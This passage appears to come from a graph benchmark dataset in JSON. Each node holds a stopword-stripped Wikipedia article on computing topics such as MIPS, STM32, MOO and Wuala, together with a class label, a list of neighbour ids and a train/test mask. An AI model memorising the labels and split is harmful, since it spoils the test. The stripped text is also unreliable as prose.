arithmetic shifts operand obtained gpr rt result written another gpr rd shift distance obtained either gpr rs 5-bit shift amount sa field mips instructions signed unsigned integer multiplication division instructions source operands two gprs write results pair 32-bit registers called hi lo since may execute separately concurrently cpu instructions multiplication high- low-order halves 64-bit product written hi lo respectively division quotient written lo remainder hi access results pair instructions move hi move lo provided copy contents hi lo gpr instructions interlocked reads hi lo proceed past unfinished arithmetic instruction write hi lo another pair instructions move hi move lo copies contents gpr hi lo instructions used restore hi lo original state exception handling instructions read hi lo must separated two instructions write hi lo mips control flow instructions followed branch delay slot unless branch delay slot filled instruction performing useful work nop substituted mips branch instructions compare contents gpr rs zero another gpr rt signed integers branch specified condition true control transferred address computed shifting 16-bit offset left two bits sign-extending 18-bit result adding 32-bit sign-extended result sum program counter instruction address 8 jumps two versions absolute register-indirect absolute jumps jump jump link compute address control transferred shifting 26-bit instr_index left two bits concatenating 28-bit result four high-order bits address instruction branch delay slot register-indirect jumps transfer control instruction address sourced gpr rs address sourced gpr must word-aligned else exception signaled instruction branch delay slot executed branch jump instructions link except jump link register save return address gpr 31 jump link register instruction permits return address saved writable gpr mips two instructions software signal exception system call breakpoint system call used user mode software make kernel calls breakpoint used transfer control debugger via kernel exception handler instructions 20-bit code field contain operating environment-specific information exception handler mips 32 floating-point registers two registers paired double precision numbers odd numbered registers used arithmetic branching part double precision register pair resulting 16 usable registers instructions moves/copies loads/stores affected single precision denoted .s suffix double precision denoted .d suffix mips ii removed load delay slot added several sets instructions shared-memory multiprocessing synchronize shared memory load linked word store conditional word instructions added set trap-on-condition instructions added instructions caused exception evaluated condition true existing branch instructions given branch-likely versions executed instruction branch delay slot branch taken instructions improve performance certain cases allowing useful instructions fill branch delay slot doubleword load store instructions cop1–3 added consistent memory access instructions loads stores required doubleword naturally aligned instruction set floating point coprocessor also several instructions added ieee 754-compliant floating-point square root instruction added supported single- double-precision operands set instructions converted single- double-precision floating-point numbers 32-bit words added complemented existing conversion instructions allowing ieee rounding mode specified instruction instead floating point control status register mips computer systems r6000 microprocessor 1989 first mips ii implementation designed servers r6000 fabricated sold bipolar integrated technology commercial failure mid-1990s many new 32-bit mips processors embedded systems mips ii implementations introduction 64-bit mips iii architecture 1991 left mips ii newest 32-bit mips architecture mips32 introduced 1999.a mips iii backwards-compatible extension mips ii added support 64-bit memory addressing integer operations 64-bit data type called doubleword mips iii extended general-purpose registers hi/lo registers program counter 64 bits support new instructions added load store doublewords perform integer addition subtraction multiplication division shift operations move doubleword gprs hi/lo registers existing instructions originally defined operate 32-bit words redefined necessary sign-extend 32-bit results permit words doublewords treated identically instructions among instructions redefined load word mips iii sign-extends words 64 bits complement load word version zero-extends added r instruction format inability specify full shift distance 64-bit shifts 5-bit shift amount field narrow specify shift distance doublewords required mips iii provide three 64-bit versions mips shift instruction first version 64-bit version original shift instructions used specify constant shift distances 0–31 bits second version similar first adds 32 shift amount field value constant shift distances 32–64 bits specified third version obtains shift distance six low-order bits gpr mips iii added supervisor privilege level existing kernel user privilege levels feature affected implementation-defined system control processor coprocessor 0 mips iii removed coprocessor 3 cp3 support instructions reused opcodes new doubleword instructions remaining coprocessors gained instructions move doublewords coprocessor registers gprs floating general registers fgrs extended 64 bits requirement instructions use even-numbered register removed incompatible earlier versions architecture bit floating-point control/status register used operate mips iii floating-point unit fpu mips i- ii-compatible mode floating-point control registers extended compatibility new floating-point instructions added copy doublewords cpu fpu convert single- double-precision floating-point numbers doubleword integers vice versa mips computer systems r4000 microprocessor 1991 first mips iii implementation designed use personal workstation server computers mips computer systems aggressively promoted mips architecture r4000 establishing advanced computing environment ace consortium advance advanced risc computing arc standard aimed establish mips dominant personal computing platform arc found little success personal computers r4000 r4400 derivative widely used workstation server computers especially largest user silicon graphics uses r4000 included high-end embedded systems supercomputers mips iii eventually implemented number embedded microprocessors quantum effect design r4600 1993 derivatives widely used high-end embedded systems low-end workstations servers mips technologies r4200 1994 designed embedded systems laptop personal computers derivative r4300i fabricated nec electronics used nintendo 64 game console nintendo 64 along playstation among highest volume users mips architecture processors mid-1990s mips iv fourth version architecture superset mips iii compatible existing versions mips mips iv designed mainly improve floating-point fp performance improve access operands indexed addressing mode base index sourced gprs fp loads stores added prefetch instructions performing memory prefetching specifying cache hints supported base offset base index addressing modes mips iv added several features improve instruction-level parallelism alleviate bottleneck caused single condition bit seven condition code bits added floating-point control status register bringing total eight fp comparison branch instructions redefined could specify condition bit written read respectively delay slot fp branch read condition bit written prior fp comparison removed support partial predication added form conditional move instructions gprs fprs implementation could choose precise imprecise exceptions ieee 754 traps mips iv added several new fp arithmetic instructions single- double-precision fpns fused-multiply add subtract reciprocal reciprocal square-root fp fused-multiply add subtract instructions perform either one two roundings implementation-defined exceed meet ieee 754 accuracy requirements respectively fp reciprocal reciprocal square-root instructions comply ieee 754 accuracy requirements produce results differ required accuracy one two units last place implementation defined instructions serve applications instruction latency important accuracy first mips iv implementation mips technologies r8000 microprocessor chipset 1994 design r8000 began silicon graphics inc. used high-end workstations servers scientific technical applications high performance large floating-point workloads important later implementations mips technologies r10000 1996 quantum effect devices r5000 1996 rm7000 1998 r10000 fabricated sold nec electronics toshiba derivatives used nec pyramid technology silicon graphics inc. tandem computers among others workstations servers supercomputers r5000 r7000 found use high-end embedded systems personal computers low-end workstations servers derivative r5000 toshiba r5900 used sony computer entertainment emotion engine powered playstation 2 game console announced october 21 1996 microprocessor forum 1996 alongside mips digital media extensions mdmx extension mips v designed improve performance 3d graphics transformations mid-1990s major use non-embedded mips microprocessors graphics workstations sgi mips v completed integer-only mdmx extension provide complete system improving performance 3d graphics applications mips v implementations never introduced may 12 1997 sgi announced h1 beast h2 capitan microprocessors former first mips v implementation due introduced first half 1999 h1 h2 projects later combined eventually canceled 1998 mips v implementations mips64 release 1 1999 based mips v retains features optional coprocessor 1 fpu feature called paired-single mips v added new data type paired single ps consisted two single-precision 32-bit floating-point numbers stored existing 64-bit floating-point registers variants existing floating-point instructions arithmetic compare conditional move added operate data type simd fashion new instructions added loading rearranging converting ps data first instruction set exploit floating-point simd existing resources mips technologies spun-out silicon graphics 1998 refocused embedded market mips v successive version strict superset previous version property found problem architecture definition changed define 32-bit 64-bit architecture mips32 mips64 introduced 1999 mips32 based mips ii additional features mips iii mips iv mips v mips64 based mips v. nec toshiba sibyte later acquired broadcom obtained licenses mips64 soon announced philips lsi logic idt raza microelectronics inc. cavium loongson technology ingenic semiconductor since joined first release mips32 based mips ii added conditional moves prefetch instructions features r4000 r5000 families 64-bit processors first release mips64 adds mips32 mode run 32-bit code mul madd multiply-add instructions previously available implementations added mips32 mips64 specifications cache control instructions announced december 6 2012 release 4 skipped number four perceived unlucky many asian cultures mips32/mips64 release 6 2014 added following removed infrequently used instructions reorganized instruction encoding freeing space future expansions micromips32/64 architectures supersets mips32 mips64 architectures respectively designed replace mips16e ase disadvantage mips16e requires mode switch 16-bit instructions processed micromips adds versions most-frequently used 32-bit instructions encoded 16-bit instructions allows programs intermix 16- 32-bit instructions without switch modes micromips introduced alongside mips32/64 release 3 subsequent release mips32/64 corresponding micromips32/64 version processor may implement micromips32/64 micromips32/64 corresponding mips32/64 subset starting mips32/64 release 6 support mips16e ended micromips form code compression mips base mips32 mips64 architectures supplemented number optional architectural extensions collectively referred application-specific extensions ases ases provide features improve efficiency performance certain workloads digital signal processing enhancements microcontroller applications mcu ase application-specific extension developed extend interrupt controller support reduce interrupt latency enhance i/o peripheral control function typically required microcontroller system designs mips16 application-specific extension mips v designed lsi logic mips technologies announced october 21 1996 alongside first implementation lsi logic tinyrisc processor mips16 subsequently licensed nec electronics philips semiconductors toshiba among others implemented extension mips ii iii architectures mips16 decreases size application 40 using 16-bit instructions instead 32-bit instructions also improves power efficiency instruction cache hit rate equivalent performance base architecture supported hardware software development tools mips technologies providers mips16e improved version mips16 first supported mips32 mips64 release 1 mips16e2 improved version mips16 supported mips32 mips64 release 5 release 6 replaced micromips dsp ase optional extension mips32/mips64 release 2 newer instruction sets used accelerate large range media computations—particularly audio video dsp module comprises set instructions state integer pipeline requires minimal additional logic implement mips processor cores revision 2 ase introduced second half 2006 revision adds extra instructions original ase otherwise backwards-compatible unlike bulk mips architecture fairly irregular set operations many chosen particular relevance key algorithm main novel features vs original mips32 make use mips dsp ase may linux 2.6.12-rc5 starting 2005-05-31 adds support dsp ase note actually make use dsp ase toolchain support required gcc already support dsp dspr2 instruction set extensions designed accelerate multimedia hardware supported virtualization technology multi-threaded mips core support two vpes virtual processing elements share single pipeline well hardware resources however since vpe includes complete copy processor state seen software system vpe appears complete standalone processor smp linux operating system fine-grained thread processing applications vpe capable supporting nine tcs allocated across two vpes tcs share common execution unit program counter core register files handle thread software mips mt architecture also allows allocation processor cycles threads sets relative thread priorities optional quality service qos manager block enables two prioritization mechanisms determine flow information across bus first mechanism allows user prioritize one thread another second mechanism used allocate specified ratio cycles specific threads time combined use mechanisms allows effective allocation bandwidth set threads better control latencies real-time systems system-level determinism critical qos block facilitates improvement predictability system hardware designers advanced systems may replace standard qos block provided mips technologies one specifically tuned application single-threaded microprocessors today waste many cycles waiting access memory considerably limiting system performance use multi-threading masks effect memory latency increasing processor utilization one thread stalls additional threads instantly fed pipeline executed resulting significant gain application throughput users allocate dedicated processing bandwidth real-time tasks resulting guaranteed quality service qos mips ’ mt technology constantly monitors progress threads dynamically takes corrective actions meet exceed real-time requirements processor pipeline achieve 80-90 utilization switching threads data-dependent stalls cache misses leads improved mobile device user experience responsiveness greatly increased smartmips application-specific extension ase designed gemplus international mips technologies improve performance reduce memory consumption smart card software supported mips32 since smart cards require capabilities mips64 processors smart cards use smartmips open virtual platforms ovp includes freely available non-commercial use simulator ovpsim library models processors peripherals platforms apis enable users develop models models library open source written c include mips 4k 24k 34k 74k 1004k 1074k m14k microaptiv interaptiv proaptiv 32-bit cores mips 64-bit 5k range cores models created maintained imperas partnership mips technologies tested assigned mips-verified tm mark sample mips-based platforms include bare metal environments platforms booting unmodified linux binary images platforms–emulators available source binaries fast free non-commercial usage easy use ovpsim developed maintained imperas fast hundreds million instructions per second built handle multicore homogeneous heterogeneous architectures systems freely available mips32 simulator earlier versions simulated r2000/r3000 called spim use education edumips64 gpl graphical cross-platform mips64 cpu simulator written java/swing supports wide subset mips64 isa allows user graphically see happens pipeline assembly program run cpu mars another gui-based mips emulator designed use education specifically use hennessy computer organization design webmips browser-based mips simulator visual representation generic pipelined processor simulator quite useful register tracking step step execution advanced free emulators available gxemul formerly known mips64emul project qemu projects emulate various mips iii iv microprocessors addition entire computer systems use commercial simulators available especially embedded use mips processors example wind river simics mips 4kc 5kc pmc rm9000 qed rm7000 broadcom/netlogic ec4400 cavium octeon imperas mips32 mips64 cores vast systems r3000 r4000 coware mips4ke mips24k mips25kf mips34k wepsim browser-based simulator subset mips instructions micro-programmed simulator useful order learn cpu works microprogramming mips routines traps interruptions system calls etc",
    "neighbors": [
      4098,
      6151,
      2066,
      2071,
      4124,
      6180,
      6181,
      8231,
      2088,
      10284,
      8237,
      2094,
      4144,
      2105,
      6207,
      2113,
      2124,
      10316,
      6243,
      6245,
      6247,
      6250,
      6252,
      6253,
      6256,
      8315,
      6268,
      8322,
      2179,
      8327,
      10375,
      4235,
      4237,
      4238,
      8352,
      8355,
      6311,
      4269,
      2224,
      2226,
      4286,
      2241,
      2243,
      8390,
      219,
      221,
      8435,
      10485,
      249,
      8450,
      6415,
      8474,
      8481,
      4386,
      2339,
      2349,
      10548,
      309,
      8501,
      8506,
      321,
      8514,
      4423,
      8523,
      6476,
      344,
      8539,
      8543,
      10603,
      10606,
      4465,
      10612,
      10620,
      8576,
      4491,
      4493,
      398,
      8594,
      2452,
      407,
      408,
      409,
      10658,
      4515,
      426,
      8621,
      10669,
      2480,
      8624,
      435,
      10675,
      10680,
      2490,
      453,
      2503,
      6607,
      466,
      2514,
      2517,
      473,
      4569,
      2523,
      10732,
      10734,
      6639,
      499,
      4596,
      2549,
      10746,
      4603,
      8700,
      508,
      10752,
      6659,
      8711,
      8716,
      8725,
      10779,
      8732,
      10781,
      10786,
      10796,
      6705,
      10813,
      2623,
      4673,
      2638,
      8795,
      604,
      2655,
      10851,
      2666,
      8815,
      630,
      8822,
      636,
      639,
      641,
      6791,
      6797,
      6799,
      8851,
      8861,
      2719,
      6815,
      6818,
      4773,
      6821,
      682,
      8890,
      10945,
      6854,
      2761,
      6858,
      2764,
      10966,
      731,
      6879,
      4841,
      10985,
      8940,
      8944,
      757,
      2805,
      760,
      2811,
      11007,
      6914,
      2821,
      6924,
      6925,
      6926,
      783,
      8976,
      6942,
      6950,
      11047,
      9003,
      6957,
      815,
      11058,
      823,
      4928,
      833,
      6978,
      11080,
      2896,
      9044,
      7001,
      7033,
      11132,
      9092,
      5028,
      9126,
      936,
      938,
      11184,
      7093,
      9152,
      3014,
      5065,
      977,
      11218,
      5076,
      7134,
      3042,
      995,
      5090,
      9190,
      1005,
      5103,
      3070,
      7170,
      3077,
      7173,
      5156,
      7215,
      7218,
      11314,
      1085,
      9280,
      7235,
      3142,
      9303,
      9309,
      7263,
      1122,
      11363,
      1126,
      3175,
      11374,
      1137,
      3188,
      5237,
      1149,
      3197,
      11396,
      7311,
      7313,
      1170,
      5272,
      9368,
      9369,
      9371,
      11424,
      9391,
      3250,
      11447,
      5326,
      5329,
      11473,
      9428,
      5339,
      11487,
      5356,
      5358,
      7421,
      1298,
      11539,
      7445,
      7450,
      9500,
      7471,
      9525,
      11580,
      9541,
      7505,
      11604,
      5467,
      1376,
      9579,
      9581,
      9582,
      1399,
      1402,
      3451,
      1409,
      3457,
      3470,
      5518,
      1425,
      1427,
      5523,
      3493,
      5541,
      9638,
      7595,
      1461,
      1462,
      1463,
      3511,
      7607,
      5569,
      1480,
      9685,
      3542,
      1499,
      7645,
      1502,
      7653,
      9707,
      3573,
      9723,
      3585,
      3586,
      7687,
      9739,
      3597,
      5645,
      9742,
      9745,
      7699,
      5655,
      5663,
      9767,
      3630,
      5681,
      5686,
      1606,
      1624,
      7783,
      7801,
      9851,
      9857,
      1682,
      5793,
      7852,
      7858,
      3764,
      9911,
      9913,
      9920,
      9921,
      9928,
      9932,
      3793,
      7889,
      9938,
      5844,
      1766,
      7911,
      9964,
      1776,
      5873,
      9976,
      5892,
      7941,
      1798,
      1801,
      5898,
      3857,
      7954,
      7963,
      1820,
      3886,
      1849,
      5948,
      10051,
      3911,
      3945,
      8044,
      1903,
      8048,
      6006,
      6038,
      6057,
      1964,
      1967,
      8120,
      8125,
      4030,
      8126,
      6084,
      8136,
      10220,
      4079,
      2039
    ],
    "mask": "Test"
  },
  {
    "node_id": 7235,
    "label": 3,
    "text": "STM32:stm32 stm32 family 32-bit microcontroller integrated circuits stmicroelectronics stm32 chips grouped related series based around 32-bit arm processor core cortex-m33f cortex-m7f cortex-m4f cortex-m3 cortex-m0+ cortex-m0 internally microcontroller consists processor core static ram flash memory debugging interface various peripherals stm32 family microcontroller ics based 32-bit risc arm cortex-m33f cortex-m7f cortex-m4f cortex-m3 cortex-m0+ cortex-m0 cores stmicroelectronics licenses arm processor ip arm holdings arm core designs numerous configurable options st chooses individual configuration use design st attaches peripherals core converting design silicon die following tables summarize stm32 microcontroller families stm32 third arm family stmicroelectronics follows earlier str9 family based arm9e core str7 family based arm7tdmi core following history stm32 family evolved stm32 family consists ten series microcontrollers h7 f7 f4 f3 f2 f1 f0 l4 l1 l0 stm32 microcontroller series based upon either cortex-m7f cortex-m4f cortex-m3 cortex-m0+ cortex-m0 arm processor core cortex-m4f conceptually cortex-m3 plus dsp single-precision floating point instructions stm32 h7-series group stm32 microcontrollers based arm cortex-m7f core stm32 f7-series group stm32 microcontrollers based arm cortex-m7f core many f7 series pin-to-pin compatible stm32 f4-series core stm32 f4-series first group stm32 microcontrollers based arm cortex-m4f core f4-series also first stm32 series dsp floating point instructions f4 pin-to-pin compatible stm32 f2-series adds higher clock speed 64 kb ccm static ram full duplex i²s improved real-time clock faster adcs summary series stm32 f3-series second group stm32 microcontrollers based arm cortex-m4f core f3 almost pin-to-pin compatible stm32 f1-series summary series distinguishing feature series presence four fast 12-bit simultaneous sampling adcs multiplexer 30 channels four matched 8 mhz bandwidth op-amps pins exposed additionally internal pga programmable gain array network exposed pads allow range analog signal conditioning circuits like band-pass filters anti-alias filters charge amplifiers integrators/differentiators 'instrumentation high-gain differential inputs eliminates need external op-amps many applications built-in two-channel dac arbitrary waveform well hardware-generated waveform sine triangle noise etc capability analog devices completely independent partially internally connected meaning one nearly everything needed advanced measurement sensor interfacing system single chip four adcs simultaneously sampled making wide range precision analog control equipment possible also possible use hardware scheduler multiplexer array allowing good timing accuracy sampling 4 channels independent main processor thread sampling multiplexing trigger controlled variety sources including timers built-in comparators allowing irregular sampling intervals needed op-amps inputs feature 2-to-1 analog multiplexer allowing total eight analog channels pre-processed using op-amp op-amp outputs internally connected adcs stm32 f2-series stm32 microcontrollers based arm cortex-m3 core recent fastest cortex-m3 series f2 pin-to-pin compatible stm32 f4-series summary series stm32 f1-series first group stm32 microcontrollers based arm cortex-m3 core considered mainstream arm microcontrollers f1-series evolved time increasing cpu speed size internal memory variety peripherals five f1 lines connectivity stm32f105/107 performance stm32f103 usb access stm32f102 access stm32f101 value stm32f100 summary series stm32 f0-series first group arm cortex-m0 chips stm32 family summary series stm32 g0-series lower power alternative l0 series stm32 l5-series evolution stm32l-series ultra-low power microcontrollers stm32 l4-series evolution stm32l1-series ultra-low power microcontrollers example l4 mcu stm32l432kc ufqfpn32 package stm32 l1-series first group stm32 microcontrollers primary goal ultra-low power usage battery-powered applications summary series stm32 l0-series first group stm32 microcontrollers based arm cortex-m0+ core series targets low power applications summary series stm32 w-series arm chips primary feature targeting rf communication applications summary series stmicroelectronics provides selection stm32 microcontrollers ready used java programming language special series embeds required features execute java programs based existing stm32 f1 f2 f4 f0 l0 families two sets special part numbers enabled java production part numbers end letter j sample part numbers end letter u following arduino header-compatible boards stm32 microcontrollers nucleo boards see next section also arduino headers nucleo boards stmicroelectronics support mbed ide development additional onboard st-link/v2-1 host adapter chip supplies swd debugging virtual com port mass storage three nucleo board families supporting different microcontroller ic package footprint debugger embedded nucleo boards converted segger j-link debugger protocol following discovery evaluation boards sold stmicroelectronics provide quick easy way engineers evaluate microcontroller chips kits available various distributors less us 20 stmicroelectronics evaluation product licence agreement forbids use production system product offered sale board includes on-board st-link programming debugging via mini-b usb connector power board provided choice 5 v via usb cable external 5 v power supply used output power supplies 3 v 5 v current must less 100 discovery boards also include voltage regulator reset button user button multiple leds swd header top board rows header pins bottom open-source project created allow linux communicate st-link debugger chibios/rt free rtos ported run discovery boards. ref name= getting started stm32vl-discovery board chibios/rt getting started stm32vl-discovery board chibios/rt /ref ref name= getting started stm32l-discovery board chibios/rt getting started stm32l-discovery board chibios/rt /ref ref name= getting started stm32f4-discovery board chibios/rt getting started stm32f4-discovery board chibios/rt /ref following evaluation kits sold stmicroelectronics ready-to-use java development kits stm32 microcontrollers stm3220g-java starter kit combines evaluation version is2t microej® software development kit sdk stm32f2 series microcontroller evaluation board providing everything engineers need start projects microej provides extended features create simulate test deploy java applications embedded systems support graphical user interface gui development includes widget library design tools including storyboarding tools customizing fonts stm32 microcontrollers embed java part number ends j like stm32f205vgt6j following evaluation kits sold partners stmicroelectronics listed st website stm32 microcontrollers rom'ed bootloader supports loading binary image flash memory using one peripherals varies stm32 family since stm32 bootloaders support loading usart peripheral boards connect usart rs-232 usb-to-uart adapter ic thus universal method program stm32 microcontroller method requires target way enable/disable booting rom'ed bootloader i.e jumper switch button amount documentation arm chips daunting especially newcomers documentation microcontrollers past decades would easily inclusive single document chips evolved documentation grown total documentation especially hard grasp arm chips since consists documents ic manufacturer stmicroelectronics documents cpu core vendor arm holdings typical top-down documentation tree manufacturer website manufacturer marketing slides manufacturer datasheet exact physical chip manufacturer detailed reference manual describes common peripherals aspects physical chip family arm core generic user guide arm core technical reference manual arm architecture reference manual describes instruction set stmicroelectronics additional documents evaluation board user manuals application notes getting started guides software library documents errata see external links section links official stm32 arm documents stm32f051r8 br stm32xxwwyz",
    "neighbors": [
      7170,
      11395,
      3467,
      6797,
      398,
      6925,
      8720,
      6033,
      1170,
      10767,
      11405,
      7445,
      666,
      5786,
      4508,
      9371,
      7326,
      4773,
      38,
      9638,
      682,
      4139,
      3629,
      2862,
      5677,
      2224,
      9391,
      11054,
      10419,
      7604,
      11314,
      823,
      11447,
      9913,
      2874,
      8253,
      5823,
      6207,
      8383,
      7234,
      7235,
      9155,
      10945,
      9928,
      2635,
      5963,
      9163,
      6607,
      7631,
      5457,
      2517,
      4821,
      9685,
      4569,
      2524,
      7774,
      6495,
      1377,
      2788,
      7269,
      1126,
      103,
      3050,
      8554,
      9964,
      11374,
      1776,
      6001,
      7281,
      2804,
      8700,
      1917,
      2814
    ],
    "mask": "None"
  },
  {
    "node_id": 7236,
    "label": 2,
    "text": "DirectX_Raytracing:directx raytracing directx raytracing dxr feature microsoft directx allows hardware real-time raytracing significant advancement computer graphics first seen consumer level gpus nvidia geforce 20 series announced 2018 dxr released part new version directx rather compatible extension directx 12 windows 10 october 2018 update includes public release directx raytracing dxr introduces 4 main elements directx 12 api",
    "neighbors": [
      7111,
      4178,
      2277,
      2943
    ],
    "mask": "None"
  },
  {
    "node_id": 7237,
    "label": 9,
    "text": "MOO_(programming_language):moo programming language moo programming language relatively simple programming language used support moo server dynamically typed uses prototype-based object-oriented system syntax roughly derived ada school programming languages stephen white authored first moo server language 1990 using c. course year pavel curtis joined project releasing first version lambdamoo server lambdamoo run maintained entirely volunteer basis sourceforge project although last packaged release 2000 development still active project cvs white describes moo mishmash c-like operators ada-like control structures combined prototype-style single-inheritance language explicit exception handling control flow well traditional looping constructs verb property hierarchy provides default values prototype objects over-riding values lower hierarchy hierarchy objects maintained delegation object parent property resulting form single inheritance special security-related attributes objects verbs properties include ownership read write execute flags moo programs byte-code compiled implicit decompilation editing providing canonical form programs moo programs orthogonally persistent periodic checkpoints objects identified unique integer identifier unused program data eliminated automatic garbage collection implemented reference counting however moo objects garbage collected manually deleted owners superusers aka wizards process called 'recycling moo explicitly multi-user system programs verbs contributed number connected users distinction made 'driver runtime 'core programs written moo language vast majority functionality running moo handled 'in-core runtime supports multi-tasking using retribution based time slicing method verbs run exclusive access database explicit locking necessary maintain synchronization simple tcp/ip messaging telnet compatible used communicate client sockets identified 'player virtual reality representation system language supports weak references objects number properties verbs strings built-in functions retrieve lists properties verbs exist giving language runtime facilities reflection server also contains support wildcard verb matching code easily used handle multiple commands similar names functions available sequence types moo lists strings support random access well head tail operations similar available lisp operations lists strings non-destructive non-object datatypes immutable built-in functions libraries allow lists also used associative arrays ordered unordered sets moo basic set control structures for-in-list fancy feature classic hello world program written moo interesting example",
    "neighbors": [
      2304,
      9345,
      10083,
      8262,
      7144,
      11625,
      7019,
      428,
      9871,
      9490,
      2045,
      7646
    ],
    "mask": "Test"
  },
  {
    "node_id": 7238,
    "label": 6,
    "text": "Wuala:wuala wuala secure online file storage file synchronization versioning backup service originally developed run caleido inc part lacie turn owned seagate technology service stores files data centres provided wuala multiple european countries france germany switzerland earlier version also supported distributed storage users machines however feature dropped 17 august 2015 wuala announced discontinuing service stored data would deleted 15 november 2015 wuala recommended rival cloud storage startup tresorit alternative remaining customers research development occurred swiss federal institute technology eth zürich 14 august 2008 19 september 2008 26 october 2008 16 december 2008 19 march 2009 5 january 2010 23 may 2011 28 september 2011 11 june 2014 31 october 2014 17 august 2015 registered user registered unregistered users receive streaming media user adds file wuala saves changes file served wuala user local copy file first encrypted chunked redundant fragments using reed-solomon error correction codes fragments uploaded data centers wuala offered free accounts 5 gb storage charge 11 june 2014 shifted paid-only service end 2014 longer support form free-only storage shifting entirely payment based usage model users joint products may start greater amounts storage limited period lacie external hard disk drive 10 gb one year lacie usb flash drive 4 gb two years additional storage may bought june 2014 referral system shut due new paid-only policy bought storage prices range 29 eur/year 20 gb 999 eur/year 1 tb pricing changed june 2014 storage plan starts 0.99 € per month 9 € per year 5 gb ends 159.90 € per month 1799 € per year 2 tb storage one distinguishing features wuala ability trade local disk storage space cloud storage longer available user interface offers features normally associated file manager additional features come integration registered user install java-based client application swt-gui web browser computer java installed computer without java running class loader prevented support following may limited according wuala faq software uses aes-256 encryption rsa-2048 key exchange signatures keys organized key management scheme called cryptree according faq wuala employs full client-side encryption files metadata – os x metadata supported – get encrypted uploaded encryption key stored one even lacie operates service decrypt stored files disadvantage wuala password recovery data processing needs done client example creating search index advantage significantly improved privacy since source code wuala released difficult ensure software states including proper client-side encryption also updates pushed automatically client machine facts mean users wuala safe possible backdoors code",
    "neighbors": [
      2050,
      10631,
      4746,
      8331,
      6797,
      4623,
      5650,
      10270,
      3366,
      7983,
      10161,
      823,
      8640,
      9281,
      10185,
      8283,
      2267,
      7139,
      107,
      5749
    ],
    "mask": "None"
  },
  {
    "node_id": 7239,
    "label": 8,
    "text": "Scieno_Sitter:scieno sitter scieno sitter content-control software installed computer blocks certain websites critical scientology viewed software released church scientology 1998 church members using windows 95 term scieno sitter coined critics scientology assert program form internet censorship program started late summer 1998 scientologists mailed software cds told program would help members build web sites would link scientology main site however recipients program told also censorship program blocked critical sites viewed user computer sites deemed dangerous critics scientology referred program cult mind-control 21st century asserted stifles freedom speech one software developer stated though thought spam filters general good idea found disturbing huge number terms banned completely unrelated stated goals however vice president office special affairs branch scientology stated scientologists make personal choice whether use filtering software different spokesperson claimed members scientology asked software stating many parishioners want use internet asked filter protection elements sought twist pervert religion packaging cd mailed users specifically request filter states popular demand scientologists program developed prevent subjected 'entheta hate mail internet filter allows direct access sites rapidly without dev-t 'd vilifying material forgeries hate messages fashion attention remain focused dissemination setting people feet bridge total freedom order gain access software scientologists must first sign contract section 7 contract states members must agree use specific internet filter program csi provided allows freedom view sites dianetics scientology principals without threat accessing sites deemed using marks works unauthorized fashion deemed improper discreditable scientology religion program works preventing user accessing sites certain keywords scientology identified objectionable material viewing members use keywords functions way prevent members learning guarded scientology doctrine xenu ot iii material relating space opera scientology scripture keywords notable topics blocked program include names several notable critics scientology including robert vaughn young keith henson well several hundred frequent participants alt.religion.scientology newsgroup together terms like suppressive person lisa mcpherson screening process limited viewing web sites however also blocks users discussing forbidden keywords chat programs internet relay chat keywords mentioned certain individuals identified undesirable enter chat room user kicked discussion tory christman worked operative osa osa operatives removed program computer allow analyze critical material spread internet scientology time software removed christman encountered operation clambake web site online discussions operator andreas heldal-lund eventually led leaving scientology public announcement alt.religion.scientology december 1998 software discussed e network program investigative reports program showed web page operation clambake described software piece entitled church scientology—afraid real world censors net members bob minton quoted report stating scientologists given filtering software allow go internet want scientologists subjected critical information 2006 film bridge scientologist character diane wheat attempts find information internet google search word zeenu directed search word xenu operation clambake web site comes first search results wheat attempts view site message appears computer stating page requested identified containing racist/hate-oriented material scientology symbol displayed left-hand side warning box",
    "neighbors": [
      5251,
      2885,
      8589
    ],
    "mask": "Test"
  },
  {
    "node_id": 7240,
    "label": 5,
    "text": "MAC-Forced_Forwarding:mac-forced forwarding mac-forced forwarding macff used control unwanted broadcast traffic host-to-host communication achieved directing network traffic hosts located subnet different locations upstream gateway device provides security layer 2 since traffic able pass directly hosts macff suitable ethernet networks layer 2 bridging device known ethernet access node ean connects access routers clients macff configured eans macff described rfc 4562 mac-forced forwarding method subscriber separation ethernet access network allied telesis switches implement macff using dhcp snooping maintain database hosts appear switch port host tries access network switch port dhcp snooping checks host ’ ip address database ensure host valid macff uses dhcp snooping check whether host gateway access router macff uses form proxy arp reply arp requests giving router mac address forces host send traffic router even traffic destined host subnet source router receives traffic makes forwarding decisions based set forwarding rules typically qos policy set filters",
    "neighbors": [
      7411,
      3847,
      5486,
      71
    ],
    "mask": "Test"
  },
  {
    "node_id": 7241,
    "label": 3,
    "text": "Configuration_Menu_Language:configuration menu language configuration menu language cml used linux kernel versions prior 2.5.45 configure values determine composition exact functionality kernel many possible variations kernel functionality exist customization possible instance specifications exact hardware run also tuned administrator preferences cml written raymond chen 1993 question-and-answer interface allowed systematic selection particular behaviors without editing multiple system files eric s. raymond wrote menu-driven module named cml2 replace officially rejected linus torvalds attributed rejection 2007 lkml.org post preference small incremental changes concern maintainer involved rewrite ca n't ... go thing expect merged said noting raymond left splash rejection linuxkernelconf replaced cml kernel version 2.5.45 remains use 4.0 kernel",
    "neighbors": [
      6352,
      2809,
      8262,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7242,
    "label": 2,
    "text": "Workload_Manager:workload manager ibm mainframes workload manager wlm base component mvs/esa mainframe operating system successors including z/os controls access system resources work executing z/os based administrator-defined goals workload manager components also exist operating systems example ibm workload manager also software product aix operating system mainframe computer many different applications execute time expectations executing work consistent execution times predictable access databases z/os workload manager wlm component fulfills needs controlling work access system resources based external specifications system administrator system administrator classifies work service classes classification mechanism uses work attributes like transaction names user identifications program names specific applications known use addition system administrator defines goals importance levels service classes representing application work goals define performance expectations work goals expressed response times relative speed termed velocity discretionary specific requirement exists response time describes duration work requests entered system application signals wlm execution completed wlm interested assure average response time set work requests ends expected time percentage work requests fulfill expectations end user definition response time also requires applications communicate wlm possible relative speed measure – named execution velocity used describe end user expectation system measurement based system states continuously collected system states describe work request uses system resource must wait used work latter named delay state quotient using states productive states using delay states multiplied 100 execution velocity measurement require communication application wlm component also abstract response time goal finally system administrator assigns importance service class tell wlm service classes get preferred access system resources system load high allow work execute service classes goal definitions organized service policies together constructs reporting controlling saved service definition access wlm active service definition saved couple data set allows z/os systems parallel sysplex cluster access execute towards performance goals wlm closed control mechanism continuously collects data work system resources compares collected aggregated measurements user definitions service definition adjusts access work system resources user expectations achieved mechanism runs continuously pre-defined time intervals order compare collected data goal definitions performance index calculated performance index service class single number tells whether goal definition could met overachieved missed wlm modifies 